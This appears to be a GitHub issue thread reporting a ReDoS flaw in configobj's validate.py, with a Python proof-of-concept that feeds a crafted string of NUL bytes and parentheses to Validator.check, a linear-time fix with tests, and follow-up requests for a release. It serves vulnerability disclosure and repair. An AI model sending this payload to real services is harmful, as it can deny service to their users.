DiffSK / configobj

Python 3+ compatible port of the configobj library

Home Page: https://configobj.readthedocs.org


A ReDoS vulnerability exists in ./src/configobj/validate.py

DarkTinia opened this issue · comments


The affected code is located in validate.py, line 660. It uses the vulnerable regular expression (.+?)\((.*)\). When the match fails, it will cause catastrophic backtracking.
I trigger the vulnerability using the Python script below:

from configobj.validate import Validator

value = "aaa"
i = 10
# Payload shape: a long run of NUL bytes, one ')', then the same number of '('.
# No ')' follows the first '(', so (.+?)\((.*)\) cannot match and backtracks
# over every possible split point before failing.
attack = '\x00'*16510*i + ')' + '('*16510*i
vtor = Validator()
# The payload is passed as the *check* string, which validate.py parses with that regex.
newval1 = vtor.check(attack, value)

I see many projects referencing this file; when run server-side there is a possible DoS. It is my pleasure to provide a patch to repair the ReDoS vulnerability.
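The pattern (.+?)\((.*)\) only has to find the first '(' that has at least one character before it and the last ')' after it, which two index lookups can do in linear time. The example below is added here and is not code from the issue author, from PR #236 or from the configobj project: it places a find/rfind splitter beside the quoted regex, checks that both agree on a set of constructed inputs, and times both on the issue's payload shape at a small size. The function names are hypothetical, and the example assumes the regex is applied with re.match and re.DOTALL (the flags configobj actually uses are not stated in the issue).

```python
import re
import time

# The pattern quoted in the issue, compiled here only so the linear-time
# replacement can be checked against it on short inputs.  re.DOTALL is an
# assumption: it makes '.' cover every byte, which is what the find/rfind
# version below reproduces.
ISSUE_PATTERN = re.compile(r'(.+?)\((.*)\)', re.DOTALL)


def split_check_regex(check):
    """Reference behaviour: the regex from the issue, applied with re.match."""
    m = ISSUE_PATTERN.match(check)
    return m.groups() if m else None


def split_check_safe(check):
    """Linear-time equivalent of split_check_regex.

    The lazy '(.+?)' needs at least one character before the '(' that opens
    the parameter list, so the first '(' at index 1 or later is the opener.
    The greedy '(.*)' followed by '\\)' then ends at the last ')' in the
    string.  Two index lookups give the same answer with no backtracking.
    """
    open_idx = check.find('(', 1)
    if open_idx == -1:
        return None
    close_idx = check.rfind(')')
    if close_idx < open_idx:
        return None
    return check[:open_idx], check[open_idx + 1:close_idx]


def agrees_with_regex(cases):
    """True if both splitters return identical results on every input."""
    return all(split_check_regex(c) == split_check_safe(c) for c in cases)


# Constructed inputs covering the boundaries of the pattern (not library data).
SAMPLE_CASES = [
    "integer(0, 10)",
    "option('a', 'b')",
    "f()",
    "foo(a)(b)",          # params run to the LAST ')'
    "foo(bar)trailing",   # re.match ignores text after the last ')'
    "(a(b)",              # a leading '(' is part of the name
    "a)(b",               # no ')' after the opener -> no match
    "no parens",
    "",
    "\x00\x00)((",        # the issue's payload shape, scaled down
]


def adversarial_input(n):
    """The issue's payload shape at a chosen size (constructed): n NULs,
    one ')', then n '('.  No ')' follows the first '(', so the regex must try
    every split point before failing, while the linear splitter fails at once."""
    return '\x00' * n + ')' + '(' * n


def time_splitters(n):
    """Seconds taken by (regex, linear) on adversarial_input(n)."""
    s = adversarial_input(n)
    t0 = time.perf_counter()
    split_check_regex(s)
    t1 = time.perf_counter()
    split_check_safe(s)
    t2 = time.perf_counter()
    return t1 - t0, t2 - t1


if __name__ == "__main__":
    assert agrees_with_regex(SAMPLE_CASES)
    regex_s, safe_s = time_splitters(3000)
    print(f"regex: {regex_s:.3f}s  linear: {safe_s:.6f}s")
```

The split_check_safe function keeps the exact accept/reject behaviour of the quoted regex, so the only observable change is the worst-case running time; a length cap on the check string before parsing is a cheap second layer of defence for deployments that cannot upgrade immediately.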

Opening a pull request that patches this vulnerability would be appreciated. Thank you.

Is this security hole fixed?

CVE-2023-26112 appears to have been assigned for this issue.


Just pinging: has any PR fixed this CVE?

Opening a pull request that patches this vulnerability would be appreciated. Thank you.

@robdennis I opened a PR, #236. Please let me know if you need me to change anything.

Any update on this one? Thanks

A new release including a fix (#236 ?) would be appreciated.

Dear https://github.com/DiffSK Team, please push a new release, containing these changes. Thank you for the prompt support!